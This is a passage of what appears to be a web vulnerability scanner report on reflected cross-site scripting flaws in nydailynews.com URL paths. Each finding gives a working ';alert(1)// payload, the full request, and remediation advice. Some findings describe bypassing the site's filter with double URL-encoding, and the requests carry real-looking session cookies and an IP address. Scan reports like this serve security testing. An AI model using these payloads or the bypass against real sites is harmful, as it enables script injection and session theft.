HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:07 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 67f8b'%3balert(1)//679ebae1116 was submitted in the REST URL parameter 4. This input was echoed as 67f8b';alert(1)//679ebae1116 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/0267f8b'%3balert(1)//679ebae1116/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:18 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3869d'%3balert(1)//a5d9277aed3 was submitted in the REST URL parameter 5. This input was echoed as 3869d';alert(1)//a5d9277aed3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/02/083869d'%3balert(1)//a5d9277aed3/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:31 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e4a65'%3balert(1)//95ed5d9a6e7 was submitted in the REST URL parameter 6. This input was echoed as e4a65';alert(1)//95ed5d9a6e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/2011/02/08/2011-02-08_long_island_university_offers_its_first_course_on_raps_history_including_origins.htmle4a65'%3balert(1)//95ed5d9a6e7 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:41:44 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70187
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a744'%3balert(1)//70065f46998 was submitted in the REST URL parameter 1. This input was echoed as 8a744';alert(1)//70065f46998 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local8a744'%3balert(1)//70065f46998/brooklyn/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:02 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70090
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bb579'%3balert(1)//88f71e0230e was submitted in the REST URL parameter 2. This input was echoed as bb579';alert(1)//88f71e0230e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklynbb579'%3balert(1)//88f71e0230e/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:37:23 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70090
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d8747'%3balert(1)//567420c1078 was submitted in the REST URL parameter 3. This input was echoed as d8747';alert(1)//567420c1078 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/index.htmld8747'%3balert(1)//567420c1078 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:38:25 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70090
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee7c6'%3balert(1)//2987d2177ac was submitted in the REST URL parameter 1. This input was echoed as ee7c6';alert(1)//2987d2177ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_localee7c6'%3balert(1)//2987d2177ac/brooklyn/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:39:12 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41796 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 1 is copied into a JavaScript rest-of-line comment. The payload 7a7b3%250aalert%25281%2529%252f%252f9dcb7d57f00 was submitted in the REST URL parameter 1. This input was echoed as 7a7b3 alert(1)//9dcb7d57f00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_local7a7b3%250aalert%25281%2529%252f%252f9dcb7d57f00/brooklyn/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:39:18 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41709 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ea3ae'%3balert(1)//bb45b094113 was submitted in the REST URL parameter 2. This input was echoed as ea3ae';alert(1)//bb45b094113 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklynea3ae'%3balert(1)//bb45b094113/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:41:47 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41697 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 2 is copied into a JavaScript rest-of-line comment. The payload 4c2d3%250aalert%25281%2529%252f%252ff0c27e3a86 was submitted in the REST URL parameter 2. This input was echoed as 4c2d3 alert(1)//f0c27e3a86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /ny_local/brooklyn4c2d3%250aalert%25281%2529%252f%252ff0c27e3a86/photo_galleries/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 200 OK Date: Tue, 08 Feb 2011 18:41:53 GMT Server: Apache Content-Type: text/html Content-Language: en Content-Length: 41663 Age: 0 Via: AX-CACHE-2.4:20
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d1e24'%3balert(1)//6fd136cc065 was submitted in the REST URL parameter 3. This input was echoed as d1e24';alert(1)//6fd136cc065 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/photo_galleriesd1e24'%3balert(1)//6fd136cc065/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:42:02 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70106
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload db3c5'%3balert(1)//66097ff38c8 was submitted in the REST URL parameter 4. This input was echoed as db3c5';alert(1)//66097ff38c8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local/brooklyn/photo_galleries/index.htmldb3c5'%3balert(1)//66097ff38c8 HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:42:13 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70106
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 968d0'%3balert(1)//ca88319aebf was submitted in the REST URL parameter 1. This input was echoed as 968d0';alert(1)//ca88319aebf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local968d0'%3balert(1)//ca88319aebf/education/2009_math_scores/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; __qca=P0-1704281983-1297185912293; __vrf=3k7r5l65ggtu5gva;
Response
HTTP/1.1 404 Not Found Date: Tue, 08 Feb 2011 18:40:29 GMT Server: Apache Connection: close Content-Type: text/html Content-Language: en Content-Length: 70108
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 18846'%3balert(1)//123be6ddee0 was submitted in the REST URL parameter 1. This input was echoed as 18846';alert(1)//123be6ddee0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /ny_local18846'%3balert(1)//123be6ddee0/education/2010_scores/index.html HTTP/1.1 Host: www.nydailynews.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: ebNewBandWidth_.www.nydailynews.com=1856%3A1297185968724; sto-id-sg-forums-8081=CDADAKAK; JSESSIONID=D9616AEF4C50BF4404650F3882F4A245; fpc1000563892833=bzFIWmAz|R9p7OeYKaa|fses1000563892833=|R9p7OeYKaa|bzFIWmAz|fvis1000563892833=ZT1odHRwJTNBJTJGJTJGYnVycCUyRnNob3clMkY0JmY9aHR0cCUzQSUyRiUyRnd3dy5ueWRhaWx5bmV3cy5jb20lMkZibG9nczcwZjc1JyUyNTNiYWxlcnQoZG9jdW1lbnQuY29va2llKSUyRiUyRjg0Zjc2NmI5YzE1JTJGamV0cyUyRjIwMTElMkYwMSUyRmxpdmUtY2hhdC1mcmlkYXktbm9vbi0xJmI9UGFnZSUyME5vdCUyMEZvdW5k|8s70ssTYHM|8s70ssTYHM|8s70ssTYHM|8|8s70ssTYHM|8s70ssTYHM; WT_FPC=id=173.193.214.243-2605364368.30126492:lv=1297189628200:ss=1297189499544; sto-id-sg-web-8080=CBACAKAK; zvents_tracker_sid=12971859055740.8106075366958976; Zvents=1djug47bp7; sto-id-sg-nydnapp-8080=CBADAKAK; 